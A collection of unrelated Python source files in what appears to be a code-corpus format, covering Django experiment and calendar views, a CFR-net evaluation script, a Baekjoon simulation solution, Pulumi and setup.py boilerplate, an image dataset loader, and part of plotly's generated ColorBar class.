exp.name = form.cleaned_data['name']
exp.slug = slugify(exp.name)
exp.save()
if oldWorkflow != exp.workflow:
workflowChanged = True
else:
workflowChanged = False
if oldName != exp.name:
nameChanged = True
else:
nameChanged = False
for cal in self.request.user.calendar_set.all():
if exp.pk in cal.data['meta']['experiments']:
cal.updateCalendar(exp, workflowChanged, nameChanged)
return HttpResponseRedirect(exp.get_absolute_url())
def get_form(self, form_class):
form = form_class(**self.get_form_kwargs())
try:
exp = self.request.user.experiment_set.get(slug=self.kwargs['experiment_slug'])
org = self.request.user.organization_set.get(slug=self.kwargs['owner_slug'])
workflows = org.workflow_set.all()
workflows = [w for w in workflows if w.user==self.request.user and w!=exp.workflow]
workflows.insert(0,exp.workflow)
form.initial['name'] = exp.name
form.fields['workflows'] = forms.ChoiceField(
label="Workflows",
choices=((x.pk,x) for x in workflows))
return form
except:
# try:
# org = self.request.user.organization_set.get(slug=self.kwargs['owner_slug'])
# workflows = org.workflow_set.all()
# workflows = [w for w in workflows if w.user==self.request.user]
# form.fields['workflows'] = forms.ChoiceField(
# label="Workflows",
# choices=((x.pk,x) for x in workflows))
# except:
# raise Http404
# return form
raise Http404
class ExperimentAddView(ExperimentSetupMixin, LoginRequiredMixin, FormView):
model = Experiment
form_class = ExperimentAddForm
slug_url_kwarg = "experiment_slug"
template_name = "experiment/experiment_add.html"
pathEnd = {'name':'Add to Calendar'}
def form_valid(self, form):
try:
calendarPKs = [x[0] for x in form.cleaned_data['calendars']]
calendars = self.request.user.calendar_set.filter(pk__in=calendarPKs)
exp = self.request.user.experiment_set.get(slug=self.kwargs['experiment_slug'])
for cal in calendars:
cal.addExperiment(exp)
return HttpResponseRedirect(calendars[0].get_absolute_url())
except:
raise Http404
def get_form(self, form_class):
form = form_class(**self.get_form_kwargs())
try:
calendars = self.request.user.calendar_set.all()
form.fields['calendars'] = forms.MultipleChoiceField(
label="Calendars",
widget=forms.CheckboxSelectMultiple,
choices=((x.pk,x) for x in calendars))
except:
raise Http404
return form
# def post(self, request, *args, **kwargs):
# '''This is done to handle the two forms'''
# form = self.form_class(request.POST)
# if form.is_valid():
# return self.form_valid(form)
# else:
# return self.form_invalid(form)
# def form_invalid(self, form):
# return self.render_to_response(self.get_context_data(form=form))
class ExperimentCreateView(ExperimentSetupMixin, LoginRequiredMixin, FormView):
model = Experiment
form_class = ExperimentManualForm
slug_url_kwarg = "owner_slug"
template_name = "experiment/experiment_form.html"
pathEnd = {'name':'New Experiment'}
def get_success_url(self):
return self.get_absolute_url()
def form_valid(self, form):
slug = self.kwargs.get(self.slug_url_kwarg, None)
org = self.request.user.organization_set.get(slug=slug)
e = Experiment()
e.user = self.request.user
e.workflow = self.request.user.workflow_set.get(pk=form.cleaned_data['workflows'][0])
e.data = {'meta':{}}
e.name = form.cleaned_data['name']
e.slug = slugify(form.cleaned_data['name'])
e.owner = org
e.save()
return HttpResponseRedirect(e.get_absolute_url())
def get_form(self, form_class):
form = form_class(**self.get_form_kwargs())
try:
org = self.request.user.organization_set.get(slug=self.kwargs['owner_slug'])
workflows = org.workflow_set.all()
workflows = [w for w in workflows if w.user==self.request.user]
form.fields['workflows'] = forms.ChoiceField(
label="Workflows",
choices=((x.pk,x) for x in workflows))
except:
raise Http404
return form
|
py | 1a4fb9b372c97bd8ceda4c046611ed934747a2ae | import sys
import os
import cPickle as pickle
from cfr.logger import Logger as Log
Log.VERBOSE = True
import cfr.evaluation as evaluation
from cfr.plotting import *
def sort_by_config(results, configs, key):
vals = np.array([cfg[key] for cfg in configs])
I_vals = np.argsort(vals)
for k in results['train'].keys():
results['train'][k] = results['train'][k][I_vals,]
results['valid'][k] = results['valid'][k][I_vals,]
if k in results['test']:
results['test'][k] = results['test'][k][I_vals,]
configs_sorted = []
for i in I_vals:
configs_sorted.append(configs[i])
return results, configs_sorted
def load_config(config_file):
with open(config_file, 'r') as f:
cfg = [l.split('=') for l in f.read().split('\n') if '=' in l]
cfg = dict([(kv[0], eval(kv[1])) for kv in cfg])
return cfg
def evaluate(config_file, overwrite=False, filters=None, embeddings=False, rname=None, ps=None):
if not os.path.isfile(config_file):
raise Exception('Could not find config file at path: %s' % config_file)
cfg = load_config(config_file)
output_dir = 'cfrnet/results/'+ps
if not os.path.isdir(output_dir):
raise Exception('Could not find output at path: %s' % output_dir)
data_train = cfg['datadir']+'/'+ps + '_train_exp.csv'
data_test = cfg['datadir']+'/'+ps + '_test_exp.csv'
binary = False
if cfg['loss'] == 'log':
binary = True
# Evaluate results
eval_path = '%s/evaluation.npz' % output_dir
if overwrite or (not os.path.isfile(eval_path)):
eval_results, configs = evaluation.evaluate(output_dir,
data_path_train=data_train,
data_path_test=data_test,
binary=binary, embeddings=embeddings, rname=rname)
# Save evaluation
pickle.dump((eval_results, configs), open(eval_path, "wb"))
else:
if Log.VERBOSE:
print 'Loading evaluation results from %s...' % eval_path
# Load evaluation
eval_results, configs = pickle.load(open(eval_path, "rb"))
# Sort by alpha
#eval_results, configs = sort_by_config(eval_results, configs, 'p_alpha')
# Print evaluation results
if binary:
plot_evaluation_bin(eval_results, configs, output_dir, data_train, data_test, filters)
else:
plot_evaluation_cont(eval_results, configs, output_dir, data_train, data_test, filters)
# Plot evaluation
if configs[0]['loss'] == 'log':
plot_cfr_evaluation_bin(eval_results, configs, output_dir)
else:
plot_cfr_evaluation_cont(eval_results, configs, output_dir)
if __name__ == "__main__":
if len(sys.argv) < 2:
print 'Usage: python evaluate.py <config_file> <overwrite (default 0)> <filters (optional)>'
else:
config_file = sys.argv[1]
ps = sys.argv[5]
overwrite = False
if len(sys.argv)>2 and sys.argv[2] == '1':
overwrite = True
filters = None
#if len(sys.argv)>3:
# filters = eval(sys.argv[3])
embeddings = False
if len(sys.argv)>3 and sys.argv[3] == '1':
embeddings = True
rname = None
if len(sys.argv)>4:
rname = sys.argv[4]
evaluate(config_file, overwrite, filters=filters, embeddings=embeddings, rname=rname, ps=ps)
|
py | 1a4fba35f43641e778ebbe4fee6bc5c3f155b165 | # https://www.acmicpc.net/problem/17135
def dfs(cur, depth):
if depth == 3:
# print(case)
check()
return
if cur == M:
return
dfs(cur + 1, depth)
case.append(cur)
dfs(cur + 1, depth + 1)
case.pop()
def check():
cnt = 0
for _ in range(N):
cnt += count_dead()
down()
for row, line in enumerate(temp):
graph[row] = line[:]
res.append(cnt)
def down():
for idx in range(N - 1, 0, -1):
graph[idx] = graph[idx - 1]
graph[0] = [0 for _ in range(M)]
def count_dead():
dead = [0 for _ in range(M)]
kill = list()
for arrow in case:
candi = list()
for row in range(N):
for col in range(M):
if graph[row][col] == 0:
continue
dist = abs(col - arrow) + abs(row - N)
if dist <= D:
candi.append((dist, col, row))
if candi:
candi = sorted(candi)
dead[candi[0][1]] = 1
kill.append(candi[0])
for k in kill:
graph[k[2]][k[1]] = 0
return sum(dead)
if __name__ == '__main__':
input = __import__('sys').stdin.readline
N, M, D = map(int,input().split())
graph = [list(map(int,input().split())) for _ in range(N)]
temp = [[] for _ in range(N)]
for row in range(N):
temp[row] = graph[row][:]
case = list()
res = list()
dfs(0, 0)
print(max(res)) |
py | 1a4fbb93ecee67a4019e435604bb47909583d90d | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
# Export this package's modules as members:
from ._enums import *
from .function import *
from .get_function import *
from .get_input import *
from .get_output import *
from .get_streaming_job import *
from .input import *
from .output import *
from .streaming_job import *
from ._inputs import *
from . import outputs
def _register_module():
import pulumi
from ... import _utilities
class Module(pulumi.runtime.ResourceModule):
_version = _utilities.get_semver_version()
def version(self):
return Module._version
def construct(self, name: str, typ: str, urn: str) -> pulumi.Resource:
if typ == "azure-native:streamanalytics/v20160301:Function":
return Function(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:streamanalytics/v20160301:Input":
return Input(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:streamanalytics/v20160301:Output":
return Output(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:streamanalytics/v20160301:StreamingJob":
return StreamingJob(name, pulumi.ResourceOptions(urn=urn))
else:
raise Exception(f"unknown resource type {typ}")
_module_instance = Module()
pulumi.runtime.register_resource_module("azure-native", "streamanalytics/v20160301", _module_instance)
_register_module()
|
py | 1a4fbc882097aee7526a8fedf4c1a80ac8763e1b | import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
from scipy.misc import imresize
from operator import itemgetter
import cv2
import pdb
# actions imshow convenience function
def actions_imshow(img,im_size):
plt.imshow(img.reshape([im_size,im_size,3]))
plt.axis('off')
# load Stanford-40 Actions dataset
def load_actions(path, inp_size):
# read filenames and labels
fid = open(path+"images.txt","r")
img_names = fid.read().splitlines()
fid.close()
fid = open(path+"labels.txt","r")
lbl_names = fid.read().splitlines()
fid.close()
fid = open(path+"splits.txt","r")
spl_names = fid.read().splitlines()
fid.close()
# parse splits
splits = []
for m in xrange(len(spl_names)):
splits.append(int(spl_names[m]))
# parse labels
trn_lbl = []
val_lbl = []
tst_lbl = []
for m in xrange(len(lbl_names)):
if splits[m]==3:
tst_lbl.append(int(lbl_names[m])-1)
else:
if splits[m]==2:
val_lbl.append(int(lbl_names[m])-1)
else:
trn_lbl.append(int(lbl_names[m])-1)
# parse images
trn_img = []
val_img = []
tst_img = []
for m in xrange(len(img_names)):
# read the image
data = cv2.imread(path+"JPEGImages/"+img_names[m])
#data = np.asarray(data)
if len(data.shape)==2:
data = np.repeat(data[:,:, np.newaxis], 3, axis=2)
data = imresize(data,(inp_size, inp_size, 3))
#pdb.set_trace()
# add it to the corresponding split
if splits[m]==3:
tst_img.append(data)
else:
if splits[m]==2:
val_img.append(data)
else:
trn_img.append(data)
return trn_img, val_img, tst_img, trn_lbl, val_lbl, tst_lbl
# return a new actions dataset
def disjoint_actions(actions,nums):
pos_trn = []
for i in range(len(nums)):
tmp = np.where(np.asarray(actions[3]) == nums[i])[0]
pos_trn = np.hstack((pos_trn,tmp))
pos_trn = np.asarray(pos_trn).astype(int)
np.random.shuffle(pos_trn)
pos_tst = []
for i in range(len(nums)):
tmp = np.where(np.asarray(actions[5]) == nums[i])[0]
pos_tst = np.hstack((pos_tst,tmp))
pos_tst = np.asarray(pos_tst).astype(int)
np.random.shuffle(pos_tst)
trn_img = itemgetter(*pos_trn)(actions[0])
val_img = actions[1]
tst_img = itemgetter(*pos_tst)(actions[2])
trn_lbl = itemgetter(*pos_trn)(actions[3])
val_lbl = actions[4]
tst_lbl = itemgetter(*pos_tst)(actions[5])
return trn_img, val_img, tst_img, trn_lbl, val_lbl, tst_lbl
# get equally distributed samples among given classes from a split
def get_ed_samples(data, samples=10):
# retrieve number of samples for each class
indx = []
classes = np.unique(data.labels)
for cl in range(len(classes)):
tmp = np.where(data.labels == classes[cl])[0]
np.random.shuffle(tmp)
indx = np.hstack((indx,tmp[0:np.min(samples, len(tmp))]))
indx = np.asarray(indx).astype(int)
return indx
|
py | 1a4fbca25f8dd38f911b3531531fbb801460f065 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import shelve
import db_config
ROOT = os.getcwd()
class Shelf:
def __init__(self):
self.db = shelve.open('db')
def set(self, key, value):
self.db[key] = value
def add_elem(self, key, value):
try:
self.db[key].add(value)
except KeyError:
pass
def get(self, key):
return self.db[key]
def close(self):
self.db.close()
d = Shelf()
# # appointment = db_config.appointment
# # problem = db_config.problem
# # advice = db_config.advice
gingvit = db_config.gingvit
pulpit = db_config.pulpit
stomatit = db_config.stomatit
d.set('stomatit', set(stomatit))
# # print(type(d.get('advice')))
d.close()
|
py | 1a4fbeabcbf7de154eae3dee3e14cc235a2f91f4 | import setuptools
with open("README.md", "r") as f:
long_description = f.read()
setuptools.setup(
name="argtyped",
version="0.3.1",
url="https://github.com/huzecong/argtyped",
author="Zecong Hu",
author_email="[email protected]",
description="Command line arguments, with types",
long_description=long_description,
long_description_content_type="text/markdown",
license="MIT License",
packages=setuptools.find_packages(),
package_data={
"argtyped": [
"py.typed", # indicating type-checked package
],
},
platforms="any",
install_requires=[],
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Topic :: System :: Shells",
"Topic :: Utilities",
"Typing :: Typed",
],
python_requires=">=3.6",
)
|
py | 1a4fbf375604f5c6527e696cb5d0dfd6ddb66068 |
# Plots are currently included as images, because example is too big to
# run on readthedocs servers
"""
Cortical depth estimation from MGDM segmentation
=================================================
This example shows how to obtain a cortical laminar depth representation from blabla.
This is like super cool.
"""
import response_fytter
|
py | 1a4fbf535e58380a69fb15bc9a0ea3ead4978513 | # pytest suite
"""
Tests for the fitsverify module.
This is a suite of tests to be run with pytest.
To run:
1) Set the environment variable GEMPYTHON_TESTDATA to the path that contains
the gempython test data files.
This suite uses the file N20130510S0178_forStack.fits.
Eg. /net/chara/data2/pub/gempython_testdata
2) From the ??? (location): py.test -v
"""
import pytest
import os
import os.path
from gempy.library import fitsverify
TESTDATAPATH = os.getenv('GEMPYTHON_TESTDATA', '.')
TESTFITS = os.path.join('GMOS', 'N20130510S0178_forStack.fits')
class TestFitsverify:
"""
Suite of tests for the functions in the fitsverify module.
"""
@classmethod
def setup_class(cls):
"""Run once at the beginning."""
TestFitsverify.fits_file = os.path.join(TESTDATAPATH, TESTFITS)
@classmethod
def teardown_class(cls):
"""Run once at the end."""
pass
def setup_method(self, method):
"""Run once before every test."""
pass
def teardown_method(self, method):
"""Run once after every test."""
pass
@pytest.mark.skip(reason='Uses local data')
def test_fitsverify(self):
"""
Test the return values of fitsverify on our test file.
"""
returned_values = fitsverify.fitsverify(TestFitsverify.fits_file)
assert returned_values[:3] == [1, '21', '0']
|
py | 1a4fbfb8c6770fee513d8763a8567b4b9f4a7a74 | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class ColorBar(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "contour"
_path_str = "contour.colorbar"
_valid_props = {
"bgcolor",
"bordercolor",
"borderwidth",
"dtick",
"exponentformat",
"len",
"lenmode",
"nticks",
"outlinecolor",
"outlinewidth",
"separatethousands",
"showexponent",
"showticklabels",
"showtickprefix",
"showticksuffix",
"thickness",
"thicknessmode",
"tick0",
"tickangle",
"tickcolor",
"tickfont",
"tickformat",
"tickformatstopdefaults",
"tickformatstops",
"ticklen",
"tickmode",
"tickprefix",
"ticks",
"ticksuffix",
"ticktext",
"ticktextsrc",
"tickvals",
"tickvalssrc",
"tickwidth",
"title",
"titlefont",
"titleside",
"x",
"xanchor",
"xpad",
"y",
"yanchor",
"ypad",
}
# bgcolor
# -------
@property
def bgcolor(self):
"""
Sets the color of padded area.
The 'bgcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["bgcolor"]
@bgcolor.setter
def bgcolor(self, val):
self["bgcolor"] = val
# bordercolor
# -----------
@property
def bordercolor(self):
"""
Sets the axis line color.
The 'bordercolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["bordercolor"]
@bordercolor.setter
def bordercolor(self, val):
self["bordercolor"] = val
# borderwidth
# -----------
@property
def borderwidth(self):
"""
Sets the width (in px) or the border enclosing this color bar.
The 'borderwidth' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["borderwidth"]
@borderwidth.setter
def borderwidth(self, val):
self["borderwidth"] = val
# dtick
# -----
@property
def dtick(self):
"""
Sets the step in-between ticks on this axis. Use with `tick0`.
Must be a positive number, or special strings available to
"log" and "date" axes. If the axis `type` is "log", then ticks
are set every 10^(n*dtick) where n is the tick number. For
example, to set a tick mark at 1, 10, 100, 1000, ... set dtick
to 1. To set tick marks at 1, 100, 10000, ... set dtick to 2.
To set tick marks at 1, 5, 25, 125, 625, 3125, ... set dtick to
log_10(5), or 0.69897000433. "log" has several special values;
"L<f>", where `f` is a positive number, gives ticks linearly
spaced in value (but not position). For example `tick0` = 0.1,
`dtick` = "L0.5" will put ticks at 0.1, 0.6, 1.1, 1.6 etc. To
show powers of 10 plus small digits between, use "D1" (all
digits) or "D2" (only 2 and 5). `tick0` is ignored for "D1" and
"D2". If the axis `type` is "date", then you must convert the
time to milliseconds. For example, to set the interval between
ticks to one day, set `dtick` to 86400000.0. "date" also has
special values "M<n>" gives ticks spaced by a number of months.
`n` must be a positive integer. To set ticks on the 15th of
every third month, set `tick0` to "2000-01-15" and `dtick` to
"M3". To set ticks every 4 years, set `dtick` to "M48"
The 'dtick' property accepts values of any type
Returns
-------
Any
"""
return self["dtick"]
@dtick.setter
def dtick(self, val):
self["dtick"] = val
# exponentformat
# --------------
@property
def exponentformat(self):
"""
Determines a formatting rule for the tick exponents. For
example, consider the number 1,000,000,000. If "none", it
appears as 1,000,000,000. If "e", 1e+9. If "E", 1E+9. If
"power", 1x10^9 (with 9 in a super script). If "SI", 1G. If
"B", 1B.
The 'exponentformat' property is an enumeration that may be specified as:
- One of the following enumeration values:
['none', 'e', 'E', 'power', 'SI', 'B']
Returns
-------
Any
"""
return self["exponentformat"]
@exponentformat.setter
def exponentformat(self, val):
self["exponentformat"] = val
# len
# ---
@property
def len(self):
"""
Sets the length of the color bar This measure excludes the
padding of both ends. That is, the color bar length is this
length minus the padding on both ends.
The 'len' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["len"]
@len.setter
def len(self, val):
self["len"] = val
# lenmode
# -------
@property
def lenmode(self):
"""
Determines whether this color bar's length (i.e. the measure in
the color variation direction) is set in units of plot
"fraction" or in *pixels. Use `len` to set the value.
The 'lenmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['fraction', 'pixels']
Returns
-------
Any
"""
return self["lenmode"]
@lenmode.setter
def lenmode(self, val):
self["lenmode"] = val
# nticks
# ------
@property
def nticks(self):
"""
Specifies the maximum number of ticks for the particular axis.
The actual number of ticks will be chosen automatically to be
less than or equal to `nticks`. Has an effect only if
`tickmode` is set to "auto".
The 'nticks' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [0, 9223372036854775807]
Returns
-------
int
"""
return self["nticks"]
@nticks.setter
def nticks(self, val):
self["nticks"] = val
# outlinecolor
# ------------
@property
def outlinecolor(self):
"""
Sets the axis line color.
The 'outlinecolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["outlinecolor"]
@outlinecolor.setter
def outlinecolor(self, val):
self["outlinecolor"] = val
# outlinewidth
# ------------
@property
def outlinewidth(self):
"""
Sets the width (in px) of the axis line.
The 'outlinewidth' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["outlinewidth"]
@outlinewidth.setter
def outlinewidth(self, val):
self["outlinewidth"] = val
# separatethousands
# -----------------
@property
def separatethousands(self):
"""
If "true", even 4-digit integers are separated
The 'separatethousands' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["separatethousands"]
@separatethousands.setter
def separatethousands(self, val):
self["separatethousands"] = val
# showexponent
# ------------
@property
def showexponent(self):
"""
If "all", all exponents are shown besides their significands.
If "first", only the exponent of the first tick is shown. If
"last", only the exponent of the last tick is shown. If "none",
no exponents appear.
The 'showexponent' property is an enumeration that may be specified as:
- One of the following enumeration values:
['all', 'first', 'last', 'none']
Returns
-------
Any
"""
return self["showexponent"]
@showexponent.setter
def showexponent(self, val):
self["showexponent"] = val
# showticklabels
# --------------
@property
def showticklabels(self):
"""
Determines whether or not the tick labels are drawn.
The 'showticklabels' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["showticklabels"]
@showticklabels.setter
def showticklabels(self, val):
self["showticklabels"] = val
# showtickprefix
# --------------
@property
def showtickprefix(self):
"""
If "all", all tick labels are displayed with a prefix. If
"first", only the first tick is displayed with a prefix. If
"last", only the last tick is displayed with a suffix. If
"none", tick prefixes are hidden.
The 'showtickprefix' property is an enumeration that may be specified as:
- One of the following enumeration values:
['all', 'first', 'last', 'none']
Returns
-------
Any
"""
return self["showtickprefix"]
@showtickprefix.setter
def showtickprefix(self, val):
self["showtickprefix"] = val
# showticksuffix
# --------------
@property
def showticksuffix(self):
"""
Same as `showtickprefix` but for tick suffixes.
The 'showticksuffix' property is an enumeration that may be specified as:
- One of the following enumeration values:
['all', 'first', 'last', 'none']
Returns
-------
Any
"""
return self["showticksuffix"]
@showticksuffix.setter
def showticksuffix(self, val):
self["showticksuffix"] = val
# thickness
# ---------
@property
def thickness(self):
"""
Sets the thickness of the color bar This measure excludes the
size of the padding, ticks and labels.
The 'thickness' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["thickness"]
@thickness.setter
def thickness(self, val):
self["thickness"] = val
# thicknessmode
# -------------
@property
def thicknessmode(self):
"""
Determines whether this color bar's thickness (i.e. the measure
in the constant color direction) is set in units of plot
"fraction" or in "pixels". Use `thickness` to set the value.
The 'thicknessmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['fraction', 'pixels']
Returns
-------
Any
"""
return self["thicknessmode"]
@thicknessmode.setter
def thicknessmode(self, val):
self["thicknessmode"] = val
# tick0
# -----
@property
def tick0(self):
"""
Sets the placement of the first tick on this axis. Use with
`dtick`. If the axis `type` is "log", then you must take the
log of your starting tick (e.g. to set the starting tick to
100, set the `tick0` to 2) except when `dtick`=*L<f>* (see
`dtick` for more info). If the axis `type` is "date", it should
be a date string, like date data. If the axis `type` is
"category", it should be a number, using the scale where each
category is assigned a serial number from zero in the order it
appears.
The 'tick0' property accepts values of any type
Returns
-------
Any
"""
return self["tick0"]
@tick0.setter
def tick0(self, val):
self["tick0"] = val
# tickangle
# ---------
@property
def tickangle(self):
"""
Sets the angle of the tick labels with respect to the
horizontal. For example, a `tickangle` of -90 draws the tick
labels vertically.
The 'tickangle' property is a angle (in degrees) that may be
specified as a number between -180 and 180. Numeric values outside this
range are converted to the equivalent value
(e.g. 270 is converted to -90).
Returns
-------
int|float
"""
return self["tickangle"]
@tickangle.setter
def tickangle(self, val):
self["tickangle"] = val
# tickcolor
# ---------
@property
def tickcolor(self):
"""
Sets the tick color.
The 'tickcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
